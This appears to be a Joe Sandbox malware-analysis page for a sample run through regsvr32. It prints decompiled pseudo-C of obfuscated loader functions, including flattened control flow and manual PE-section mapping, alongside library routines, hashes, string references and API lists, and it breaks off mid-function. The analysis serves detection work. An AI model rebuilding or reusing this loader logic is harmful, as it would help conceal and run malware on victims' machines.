Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: It$~DH$~DH$F
API String ID: 0-1591696103
Opcode ID: 7b537aedf8a87ca5892faf76ec803015023ac387c18bd7bdeed28818af9253ab
Instruction ID: b149f60d3d5b2a0250c5e5b1869e2783e634292dd8872a6040857950e52d5656
Opcode Fuzzy Hash: 7b537aedf8a87ca5892faf76ec803015023ac387c18bd7bdeed28818af9253ab
Instruction Fuzzy Hash: FBA112B16083428BC344CF24D58980BFBE1FBD8748F104A2DF595A7261D7B9DA4ACB97

Uniqueness

Uniqueness Score: -1.00%

Function 04F7D8FE Relevance: 5.2, Strings: 4, Instructions: 178
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04F7D8FE() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				void* _t167;
				short* _t169;
				void* _t172;
				intOrPtr _t175;
				signed int _t198;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				intOrPtr _t206;
				void* _t227;

				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_v540 = 0x720a4;
				_t167 = 0xef248;
				_v536 = 0x3a976;
				do {
					while(_t167 != 0x70b47) {
						if(_t167 == 0xb7d0f) {
							_v556 = 0xdf9e02;
							_v556 = _v556 * 0x2b;
							_v556 = _v556 ^ 0x2586cb95;
							_v560 = 0x3293a2;
							_v560 = _v560 << 4;
							_v560 = _v560 ^ 0x0327da67;
							_v552 = 0xa85676;
							_v552 = _v552 + 0xfffff4b4;
							_v552 = _v552 ^ 0x00a4c787;
							_v544 = 0x12f445;
							_v544 = _v544 + 0xffff1481;
							_v544 = _v544 * 0x6c;
							_v544 = _v544 + 0xffff03dd;
							_v544 = _v544 ^ 0x079d4b98;
							_t172 = E04F7D6A7(_v556, _v560, _v552, 0x4f613ec, _v544);
							_v560 = 0xd7e03d;
							_v560 = _v560 << 0xc;
							_v560 = _v560 >> 7;
							_v560 = _v560 ^ 0xcf8702fd;
							_v560 = _v560 ^ 0xcf793c91;
							_v552 = 0xd71bb0;
							_v552 = _v552 ^ 0xf0f5d32e;
							_v552 = _v552 + 0x448d;
							_v552 = _v552 ^ 0xf027e429;
							_v556 = 0x4ca0d2;
							_v556 = _v556 >> 3;
							_v556 = _v556 + 0xffffbbbe;
							_v556 = _v556 >> 5;
							_v556 = _v556 ^ 0x000b57ea;
							_v544 = 0xbb7d86;
							_v544 = _v544 << 0x10;
							_v544 = _v544 >> 0xe;
							_v544 = _v544 * 0x39;
							_v544 = _v544 ^ 0x00667171;
							_v548 = 0x143efd;
							_v548 = _v548 + 0x4bac;
							_v548 = _v548 ^ 0x0010e07b;
							_t175 =  *0x4f8221c; // 0x33fd420
							_t206 =  *0x4f8221c; // 0x33fd420
							E04F736BB(_t206 + 4, __eflags, _v556, _v552, _t175 + 0x220, _v556, _v544, _t172, _v548,  &_v524);
							_v552 = 0x18ce47;
							_v552 = _v552 | 0x65afab26;
							_t198 = 0x7b;
							_v552 = _v552 / _t198;
							_v552 = _v552 ^ 0x00d5c4e2;
							_v560 = 0x37ce6e;
							_v560 = _v560 >> 3;
							_v560 = _v560 ^ 0x887316d5;
							_v560 = _v560 + 0xd0b1;
							_v560 = _v560 ^ 0x88724b04;
							_v556 = 0x3f6856;
							_v556 = _v556 | 0x1e3bd5ce;
							_v556 = _v556 ^ 0x1e3f38fe;
							_v548 = 0xf2bd66;
							_v548 = _v548 * 0x61;
							_v548 = _v548 ^ 0x5bfa3e3e;
							E04F6845B(_v552, _v560, _v556, _v548, _t172);
							_t227 = _t227 + 0x38;
							_t167 = 0x70b47;
							continue;
						} else {
							if(_t167 == 0xef248) {
								_t167 = 0xb7d0f;
								continue;
							} else {
								if(_t167 != 0xf9533) {
									goto L10;
								} else {
									_v548 = 0x17eafc;
									_v548 = _v548 ^ 0x7b712320;
									_v548 = _v548 ^ 0x7b6892c4;
									_v556 = 0x3818f2;
									_t200 = 0x18;
									_v556 = _v556 / _t200;
									_v556 = _v556 + 0x13e3;
									_t201 = 0x7a;
									_v556 = _v556 * 0x15;
									_v556 = _v556 ^ 0x003c3f3e;
									_v560 = 0xfe3727;
									_t202 = 0x22;
									_v560 = _v560 / _t201;
									_v560 = _v560 / _t202;
									_v560 = _v560 + 0xdf45;
									_v560 = _v560 ^ 0x0008db77;
									_t167 = E04F7169D(E04F6D8E0, 0, _v548, _v556,  &_v524,  &_v524, _v560);
								}
							}
						}
						L6:
						return _t167;
					}
					_v552 = 0xb82e09;
					_v552 = _v552 * 0x14;
					_v552 = _v552 ^ 0x0e6440b8;
					_v548 = 0xb12c2;
					_v548 = _v548 >> 7;
					_v548 = _v548 ^ 0x0006b2f0;
					_t169 = E04F73E30(_v552,  &_v524, _v548);
					__eflags = 0;
					 *_t169 = 0;
					_t167 = 0xf9533;
					L10:
					__eflags = _t167 - 0x11200;
				} while (_t167 != 0x11200);
				goto L6;
			}

0x04f7d904
0x04f7d909
0x04f7d916
0x04f7d91f
0x04f7d921
0x04f7d933
0x04f7d933
0x04f7d940
0x04f7da07
0x04f7da14
0x04f7da18
0x04f7da20
0x04f7da28
0x04f7da2d
0x04f7da35
0x04f7da3d
0x04f7da45
0x04f7da4d
0x04f7da55
0x04f7da62
0x04f7da66
0x04f7da6e
0x04f7da8b
0x04f7da90
0x04f7da9a
0x04f7daa2
0x04f7daa7
0x04f7daaf
0x04f7dab7
0x04f7dabf
0x04f7dac7
0x04f7dacf
0x04f7dad7
0x04f7dadf
0x04f7dae4
0x04f7daec
0x04f7daf1
0x04f7daf9
0x04f7db01
0x04f7db06
0x04f7db10
0x04f7db18
0x04f7db20
0x04f7db28
0x04f7db30
0x04f7db46
0x04f7db55
0x04f7db63
0x04f7db68
0x04f7db72
0x04f7db80
0x04f7db83
0x04f7db87
0x04f7db8f
0x04f7db97
0x04f7db9c
0x04f7dba4
0x04f7dbac
0x04f7dbb4
0x04f7dbbc
0x04f7dbc4
0x04f7dbcc
0x04f7dbd9
0x04f7dbdd
0x04f7dbf6
0x04f7dbfb
0x04f7dbfe
0x00000000
0x04f7d946
0x04f7d948
0x04f7da00
0x00000000
0x04f7d94e
0x04f7d950
0x00000000
0x04f7d956
0x04f7d956
0x04f7d960
0x04f7d968
0x04f7d970
0x04f7d97e
0x04f7d983
0x04f7d989
0x04f7d996
0x04f7d999
0x04f7d99d
0x04f7d9a5
0x04f7d9b3
0x04f7d9b4
0x04f7d9c7
0x04f7d9cf
0x04f7d9d7
0x04f7d9ed
0x04f7d9f2
0x04f7d950
0x04f7d948
0x04f7d9f5
0x04f7d9ff
0x04f7d9ff
0x04f7dc08
0x04f7dc19
0x04f7dc1d
0x04f7dc25
0x04f7dc2d
0x04f7dc32
0x04f7dc42
0x04f7dc48
0x04f7dc4a
0x04f7dc4d
0x04f7dc4f
0x04f7dc4f
0x04f7dc4f
0x00000000

Strings

qqf, xrefs: 04F7DB18
>?<, xrefs: 04F7D99D
Vh?, xrefs: 04F7DBB4
#q{, xrefs: 04F7D960

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #q{$>?<$Vh?$qqf
API String ID: 0-1791900576
Opcode ID: e8a0b2aebea4ae96d7891d20bbf1bf640cf8c67d8cb231fe53f83660dc693853
Instruction ID: 31f8056ad01c76212a1ca59abb992f81b218c5325638a607b70b1c8de1a860fe
Opcode Fuzzy Hash: e8a0b2aebea4ae96d7891d20bbf1bf640cf8c67d8cb231fe53f83660dc693853
Instruction Fuzzy Hash: 5B81F1725093419BC344CF26D98951BBBF1FBC4748F408A5DF18AA6260D3B8DA0ACF97

Uniqueness

Uniqueness Score: -1.00%

Function 04F6F88D Relevance: 5.2, Strings: 4, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E04F6F88D(intOrPtr* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t149;
				void* _t152;
				signed int _t169;
				intOrPtr* _t172;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				void* _t199;
				void* _t201;
				void* _t205;
				signed int* _t208;
				signed int* _t209;
				signed int* _t210;

				_push(_a8);
				_t172 = __edx;
				_push(_a4);
				_push(__edx);
				_push(0);
				E04F732C4(_t149);
				_v4 = 0x2fd4;
				_v8 = 0x66bbad;
				_v8 = _v8 + 0xfffff643;
				_v8 = _v8 ^ 0x006ee5ac;
				_v28 = 0x8a4229;
				_v28 = _v28 * 0x19;
				_v28 = _v28 + 0x8aef;
				_v28 = _v28 + 0xffff34cf;
				_v28 = _v28 ^ 0x0d82bfbc;
				_t152 = E04F6CB43(__edx, _v8, _v28);
				_t201 = _t152;
				_t208 =  &(( &_v28)[5]);
				if(_t201 != 0) {
					_v24 = 0xcd4f13;
					_v24 = _v24 + 0xffff25b5;
					_v24 = _v24 >> 0xf;
					_t174 = 0x5f;
					_v24 = _v24 / _t174;
					_v24 = _v24 ^ 0x00001004;
					_v28 = 0x5d3636;
					_v28 = _v28 | 0x52ba1c5c;
					_v28 = _v28 + 0xc51f;
					_t175 = 0x48;
					_v28 = _v28 * 0x2b;
					_v28 = _v28 ^ 0xf100bb5f;
					_v20 = 0x5f8882;
					_v20 = _v20 | 0xbc7efbd6;
					_v20 = _v20 ^ 0xbc7ffb96;
					_v8 = 0x6f3708;
					_v8 = _v8 + 0xffff4773;
					_v8 = _v8 + 0x8d71;
					_v8 = _v8 ^ 0x006dc250;
					_v4 = 0xfcd66;
					_v4 = _v4 << 0xc;
					_v4 = _v4 ^ 0xfcd20476;
					_v12 = 0x35d009;
					_v12 = _v12 / _t175;
					_v12 = _v12 ^ 0x49aa2f1f;
					_v12 = _v12 ^ 0x49a4f59b;
					_v16 = 0x478535;
					_v16 = _v16 + 0x3e0;
					_v16 = _v16 | 0x2178e36b;
					_v16 = _v16 ^ 0x217ee139;
					_t205 = E04F73206(_v8,  *((intOrPtr*)(_t201 + 0x50)), _v28 | _v24, _v4, _v12, _v16, _v20);
					_t209 =  &(_t208[6]);
					if(_t205 == 0) {
						L5:
						return _t205;
					}
					_v24 = 0x43d424;
					_v24 = _v24 | 0x26bc11fe;
					_v24 = _v24 << 0xc;
					_t176 = 0x24;
					_v24 = _v24 / _t176;
					_v24 = _v24 ^ 0x0703d43e;
					_v4 = 0x7caddb;
					_v4 = _v4 + 0xffff7761;
					_v4 = _v4 ^ 0x00705d77;
					_v8 = 0x3096a2;
					_v8 = _v8 | 0xe72ee49f;
					_t177 = 0x1f;
					_v8 = _v8 / _t177;
					_v8 = _v8 ^ 0x077677e7;
					E04F6C8F0(_t205, _v24, _v4,  *_t172,  *((intOrPtr*)(_t201 + 0x54)), _v8);
					_t210 =  &(_t209[4]);
					_t199 = ( *(_t201 + 0x14) & 0x0000ffff) + 0x18 + _t201;
					_t169 = ( *(_t201 + 6) & 0x0000ffff) * 0x28 + _t199;
					_v16 = _t169;
					if(_t199 >= _t169) {
						L4:
						goto L5;
					} else {
						goto L3;
					}
					do {
						L3:
						_t194 =  <  ?  *((void*)(_t199 + 8)) :  *((intOrPtr*)(_t199 + 0x10));
						_v12 = 0x216d41;
						_t127 =  &_v12; // 0x216d41
						_v12 =  *_t127 * 0x5b;
						_v12 = _v12 + 0xffff09db;
						_v12 = _v12 ^ 0x0be97edb;
						_v8 = 0xe61c5;
						_v8 = _v8 | 0x302557dd;
						_v8 = _v8 ^ 0x75120605;
						_v8 = _v8 ^ 0x453348b8;
						_v4 = 0xb875be;
						_v4 = _v4 << 0x10;
						_v4 = _v4 ^ 0x75bf053a;
						E04F6C8F0( *((intOrPtr*)(_t199 + 0xc)) + _t205, _v12, _v8,  *_t172 +  *((intOrPtr*)(_t199 + 0x14)),  <  ?  *((void*)(_t199 + 8)) :  *((intOrPtr*)(_t199 + 0x10)), _v4);
						_t199 = _t199 + 0x28;
						_t210 =  &(_t210[4]);
					} while (_t199 < _v16);
					goto L4;
				}
				return _t152;
			}

0x04f6f892
0x04f6f896
0x04f6f898
0x04f6f89c
0x04f6f89d
0x04f6f89f
0x04f6f8a4
0x04f6f8ae
0x04f6f8b6
0x04f6f8be
0x04f6f8c6
0x04f6f8d3
0x04f6f8d7
0x04f6f8df
0x04f6f8e7
0x04f6f8f7
0x04f6f8fc
0x04f6f8fe
0x04f6f903
0x04f6f909
0x04f6f913
0x04f6f91b
0x04f6f927
0x04f6f92c
0x04f6f932
0x04f6f93a
0x04f6f942
0x04f6f94a
0x04f6f957
0x04f6f958
0x04f6f95c
0x04f6f964
0x04f6f96c
0x04f6f974
0x04f6f97c
0x04f6f984
0x04f6f98c
0x04f6f994
0x04f6f99c
0x04f6f9a4
0x04f6f9a9
0x04f6f9b1
0x04f6f9bf
0x04f6f9c3
0x04f6f9cb
0x04f6f9d3
0x04f6f9db
0x04f6f9e3
0x04f6f9eb
0x04f6fa18
0x04f6fa1a
0x04f6fa1f
0x04f6fb58
0x00000000
0x04f6fb5a
0x04f6fa25
0x04f6fa2f
0x04f6fa37
0x04f6fa43
0x04f6fa48
0x04f6fa4e
0x04f6fa56
0x04f6fa5e
0x04f6fa66
0x04f6fa6e
0x04f6fa76
0x04f6fa82
0x04f6fa87
0x04f6fa8b
0x04f6faa4
0x04f6faad
0x04f6faba
0x04f6fabc
0x04f6fabe
0x04f6fac4
0x04f6fb57
0x00000000
0x00000000
0x00000000
0x00000000
0x04f6faca
0x04f6faca
0x04f6fada
0x04f6fade
0x04f6fae6
0x04f6faeb
0x04f6faef
0x04f6faf7
0x04f6faff
0x04f6fb07
0x04f6fb0f
0x04f6fb17
0x04f6fb1f
0x04f6fb27
0x04f6fb2c
0x04f6fb42
0x04f6fb47
0x04f6fb4a
0x04f6fb4d
0x00000000
0x04f6faca
0x04f6fb60

Strings

9~!, xrefs: 04F6F9EB
w]p, xrefs: 04F6FA66
66], xrefs: 04F6F93A
Am!, xrefs: 04F6FAE6

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 66]$9~!$Am!$w]p
API String ID: 0-3533504821
Opcode ID: 22ebe231c365379f7613b72d9006ad94c82d0db7f2a6db9a42f4685cefd34a6f
Instruction ID: 51e4a2141d5175a470e174671ab1c25f5cfb1c69650218922673db2af7de4d40
Opcode Fuzzy Hash: 22ebe231c365379f7613b72d9006ad94c82d0db7f2a6db9a42f4685cefd34a6f
Instruction Fuzzy Hash: B7712371508342AFD304CF25D88941BFBE2FBD8758F008A1DF599A6261D3B5DA4ACF86

Uniqueness

Uniqueness Score: -1.00%

Function 10008124 Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E10008124(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E10007FDE() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E100080D8( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x100399d4(_a4, _a8);
			}

0x10008131
0x10008145
0x10008159
0x10008171
0x1000815b
0x10008162
0x10008162
0x10008179
0x00000000
0x1000817b
0x00000000
0x10008182
0x10008179
0x00000000
0x10008147
0x00000000

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 837f7bd68fc091c01c5830c09a645d0677a14366c937db8e6e197394eb5cbdaa
Instruction ID: f51ade9db6b66146198455b1a722f54783d3ca4e56b64607bb9dec9b8805bbbf
Opcode Fuzzy Hash: 837f7bd68fc091c01c5830c09a645d0677a14366c937db8e6e197394eb5cbdaa
Instruction Fuzzy Hash: FEF01435604109FAEF01EF60CC85AEE3BADFF043D0B148425FC9595069DB30DB56AB50

Uniqueness

Uniqueness Score: -1.00%

Function 10006D70 Relevance: 4.5, APIs: 3, Instructions: 34
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10006D70() {
				char _v8;
				char _t12;
				intOrPtr* _t16;
				signed int _t18;

				_t18 = 0;
				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v8, 7) == 0) {
					L5:
					return GetACP();
				} else {
					_t12 = _v8;
					_t16 =  &_v8;
					if(_t12 == 0) {
						goto L5;
					} else {
						do {
							_t16 = _t16 + 1;
							_t18 = _t12 + (_t18 + _t18 * 4) * 2 - 0x30;
							_t12 =  *_t16;
						} while (_t12 != 0);
						if(_t18 != 0) {
							return _t18;
						} else {
							goto L5;
						}
					}
				}
			}

0x10006d74
0x10006d91
0x10006db5
0x10006dbf
0x10006d93
0x10006d93
0x10006d99
0x10006d9d
0x00000000
0x10006da0
0x10006da0
0x10006da6
0x10006da7
0x10006dab
0x10006dad
0x10006db3
0x10006dc6
0x00000000
0x00000000
0x00000000
0x10006db3
0x10006d9d

APIs

GetThreadLocale.KERNEL32 ref: 10006D76
GetLocaleInfoA.KERNEL32(00000000,00001004,00000007,00000007), ref: 10006D89
GetACP.KERNEL32 ref: 10006DB5

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Locale$InfoThread
String ID:
API String ID: 4232894706-0
Opcode ID: 85907ff4306826a4aa72ba56dfad2dd8d3fd872cb1d1f7230aa6e02e958f4bcd
Instruction ID: 490b0d694547b1a21d842e3b22888a99278e22a1696141cfa563206d99bfac34
Opcode Fuzzy Hash: 85907ff4306826a4aa72ba56dfad2dd8d3fd872cb1d1f7230aa6e02e958f4bcd
Instruction Fuzzy Hash: F9F0E231B04731DBEE11DF209C446EB3BA4AF04BC2F65014DE9C597158E720A90EC6F2

Uniqueness

Uniqueness Score: -1.00%

Function 1002871E Relevance: 4.5, APIs: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002871E(void* __ecx, void* __eflags) {
				struct HICON__* _t14;
				intOrPtr _t15;
				void* _t22;

				_t22 = __ecx;
				 *(_t22 + 0x54) = GetVersion() >> 0x1f;
				E1002330D(_t22);
				 *((intOrPtr*)(_t22 + 0x24)) = 0;
				E100232C9(_t22);
				 *((intOrPtr*)(_t22 + 0x3c)) = LoadCursorA(0, 0x7f02);
				_t14 = LoadCursorA(0, 0x7f00);
				 *(_t22 + 0x40) = _t14;
				_t15 = 2;
				 *((intOrPtr*)(_t22 + 0x10)) = _t15;
				 *((intOrPtr*)(_t22 + 0x14)) = _t15;
				 *((intOrPtr*)(_t22 + 0x50)) = 0;
				 *((intOrPtr*)(_t22 + 0x44)) = 0;
				return _t22;
			}

0x10028721
0x1002872e
0x10028731
0x1002873a
0x1002873d
0x10028756
0x10028759
0x1002875d
0x10028760
0x10028761
0x10028764
0x10028768
0x1002876b
0x10028772

APIs

GetVersion.KERNEL32 ref: 10028723

Part of subcall function 1002330D: GetSystemMetrics.USER32 ref: 1002331A
Part of subcall function 1002330D: GetSystemMetrics.USER32 ref: 10023321
Part of subcall function 1002330D: GetSystemMetrics.USER32 ref: 10023328
Part of subcall function 1002330D: GetSystemMetrics.USER32 ref: 10023332
Part of subcall function 1002330D: GetDC.USER32(00000000), ref: 1002333C
Part of subcall function 1002330D: GetDeviceCaps.GDI32(00000000,00000058), ref: 1002334D
Part of subcall function 1002330D: GetDeviceCaps.GDI32(00000000,0000005A), ref: 10023355
Part of subcall function 1002330D: ReleaseDC.USER32 ref: 1002335D

Part of subcall function 100232C9: GetSysColor.USER32(0000000F), ref: 100232D5
Part of subcall function 100232C9: GetSysColor.USER32(00000010), ref: 100232DC
Part of subcall function 100232C9: GetSysColor.USER32(00000014), ref: 100232E3
Part of subcall function 100232C9: GetSysColor.USER32(00000012), ref: 100232EA
Part of subcall function 100232C9: GetSysColor.USER32(00000006), ref: 100232F1
Part of subcall function 100232C9: GetSysColorBrush.USER32(0000000F), ref: 100232FE
Part of subcall function 100232C9: GetSysColorBrush.USER32(00000006), ref: 10023305

LoadCursorA.USER32 ref: 1002874E
LoadCursorA.USER32 ref: 10028759

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$MetricsSystem$BrushCapsCursorDeviceLoad$ReleaseVersion
String ID:
API String ID: 2477918248-0
Opcode ID: f1e3508761ee5fbb0f510f4309181fd48cce150273254d9dc251c5d33e8395b9
Instruction ID: ebefcf91f29ecaad361925b9385dc811dfa003bc173f23deb6da52c84145af98
Opcode Fuzzy Hash: f1e3508761ee5fbb0f510f4309181fd48cce150273254d9dc251c5d33e8395b9
Instruction Fuzzy Hash: 40F0DAB1A057109BD320AFBA998991BFBE8FB44B107504D2FE14AC7A41CBB5A4048B90

Uniqueness

Uniqueness Score: -1.00%

Function 1000DF4C Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 498
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E1000DF4C(signed int* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t240;
				intOrPtr* _t241;
				signed int _t249;
				signed int _t253;
				signed int _t254;
				signed int _t260;
				signed int _t263;
				signed int _t267;
				void* _t272;
				void* _t274;
				signed int _t276;
				void* _t278;
				signed int _t281;
				void* _t304;
				intOrPtr* _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				void* _t319;
				signed int* _t320;
				intOrPtr _t342;
				signed int _t346;
				signed int _t359;
				signed int _t390;
				signed int _t392;
				signed int _t396;
				void* _t402;
				signed int _t405;
				signed int _t408;
				signed int _t410;
				signed int _t414;
				void* _t416;
				signed int _t418;
				signed int _t422;
				void* _t423;
				signed int _t427;
				signed int _t430;
				void* _t432;
				void* _t434;
				intOrPtr _t435;
				signed int _t439;

				E10011A8C(E1002AC4C, _t432);
				_t435 = _t434 - 0x54;
				_t240 =  *0x100371f4; // 0x39cf7dc9
				 *(_t432 - 0x3c) =  *(_t432 - 0x3c) & 0x00000000;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t320 = __ecx;
				 *((intOrPtr*)(_t432 - 0x14)) = _t240;
				 *((intOrPtr*)(_t432 - 0x10)) = _t435;
				 *((intOrPtr*)(_t432 - 0x48)) = __ecx;
				asm("movsd");
				 *((char*)(_t432 - 0x3d)) = 0;
				_t241 =  *((intOrPtr*)(_t432 + 8));
				 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
				_t418 =  *((intOrPtr*)( *_t241))(_t241, 0x1002da1c, _t432 - 0x3c, _t402, _t416, _t319);
				if(_t418 >= 0) {
					_t419 = __ecx + 0x14;
					__eflags =  *_t419;
					 *(_t432 - 0x2c) = 0;
					if( *_t419 != 0) {
						 *((char*)(__ecx + 0x1c)) = 1;
						goto L13;
					} else {
						 *(_t432 - 0x28) = 0;
						_t311 =  *((intOrPtr*)(_t432 + 8));
						 *(_t432 - 4) = 1;
						_t312 =  *((intOrPtr*)( *_t311))(_t311, 0x1002d9fc, _t432 - 0x28);
						 *(_t432 - 0x38) = _t312;
						__eflags = _t312;
						_t313 =  *(_t432 - 0x28);
						if(_t312 >= 0) {
							_t314 =  *((intOrPtr*)( *_t313 + 0xc))(_t313, __ecx + 0xc, _t419, __ecx + 0x18);
							_t419 = _t314;
							__eflags = _t314;
							_t315 =  *(_t432 - 0x28);
							 *(_t432 - 4) = 0;
							if(_t314 >= 0) {
								__eflags = _t315;
								 *((char*)(__ecx + 0x1c)) = 0;
								if(_t315 != 0) {
									 *((intOrPtr*)( *_t315 + 8))(_t315);
								}
								L13:
								 *(_t432 - 0x34) = 0;
								 *(_t432 - 4) = 2;
								 *(_t432 - 0x34) = E1001F51F(_t320[3] * 0x34);
								 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
								__eflags =  *(_t432 - 0x34);
								if( *(_t432 - 0x34) != 0) {
									 *(_t432 - 4) = 4;
									_t320[4] = E1001F51F(_t320[3]);
									_t405 = 0;
									__eflags = _t320[4];
									 *(_t432 - 4) = 0;
									if(__eflags != 0) {
										 *(_t432 - 0x30) =  *(_t432 - 0x34);
										 *(_t432 - 0x38) = 0;
										while(1) {
											__eflags = _t405 - _t320[3];
											if(_t405 >= _t320[3]) {
												break;
											}
											 *((char*)(_t405 + _t320[4])) = 0;
											_t410 = _t405 + _t405 * 2 << 4;
											_t272 = _t320[5] + _t410;
											__eflags =  *(_t272 + 0x10) - _t320[9];
											if( *(_t272 + 0x10) <= _t320[9]) {
												L41:
												_t342 =  *((intOrPtr*)(_t272 + 0x14));
												__eflags = _t342 - 0xd;
												if(_t342 != 0xd) {
													__eflags = _t342 - 0x81;
													if(_t342 == 0x81) {
														_t156 = _t272 + 0x10;
														 *_t156 =  *(_t272 + 0x10) + 1;
														__eflags =  *_t156;
													}
													_t274 = _t320[5] + _t410;
													__eflags =  *((short*)(_t274 + 0x14)) - 0x82;
													if( *((short*)(_t274 + 0x14)) == 0x82) {
														 *((intOrPtr*)(_t274 + 0x10)) =  *((intOrPtr*)(_t274 + 0x10)) +  *((intOrPtr*)(_t274 + 0x10)) + 2;
													}
													_t276 = _t320[5] + _t410;
													__eflags = _t276;
													 *(_t432 - 0x28) = _t276;
													_t278 = E1000A38C( *(_t276 + 0x14) & 0x0000ffff);
													_push(0);
													goto L55;
												} else {
													 *(_t432 - 0x44) =  *(_t432 - 0x44) & 0x00000000;
													 *(_t432 - 4) = 8;
													 *(_t432 - 0x44) = E1001F51F(0x14);
													 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
													__eflags =  *(_t432 - 0x44);
													if( *(_t432 - 0x44) != 0) {
														goto L49;
													} else {
														_t414 =  *(_t432 - 0x38);
														__eflags = _t414;
														if(__eflags > 0) {
															_t427 =  *(_t432 - 0x34) + 0x14;
															__eflags = _t427;
															do {
																_push( *_t427);
																L1001F54A(_t320, _t414, _t427, __eflags);
																_t427 = _t427 + 0x34;
																_t414 = _t414 - 1;
																__eflags = _t414;
															} while (__eflags != 0);
														}
														goto L47;
													}
												}
											} else {
												__eflags =  *((short*)(_t272 + 0x14)) - 0xd;
												if( *((short*)(_t272 + 0x14)) == 0xd) {
													goto L41;
												} else {
													_t359 = _t320[8];
													__eflags = _t359 - 2;
													if(_t359 != 2) {
														__eflags = _t359 - 1;
														if(_t359 != 1) {
															__eflags =  *((char*)(_t432 - 0x3d));
															if(__eflags == 0) {
																_t419 = 0;
																 *((intOrPtr*)(_t432 - 0x5c)) = 0x89;
																 *((intOrPtr*)(_t432 - 0x58)) = 0x8b;
																 *(_t432 - 0x50) = 0;
																 *(_t432 - 0x4c) = 0;
																E1000DE74(0, __eflags,  *((intOrPtr*)(_t432 + 8)), _t432 - 0x5c, _t432 - 0x50, 2);
																__eflags =  *(_t432 - 0x50);
																if( *(_t432 - 0x50) == 0) {
																	__eflags =  *(_t432 - 0x4c);
																	if( *(_t432 - 0x4c) != 0) {
																		_t419 = 0x1002db64;
																		goto L32;
																	}
																} else {
																	_t419 = 0x1002db74;
																	L32:
																	asm("movsd");
																	asm("movsd");
																	asm("movsd");
																	asm("movsd");
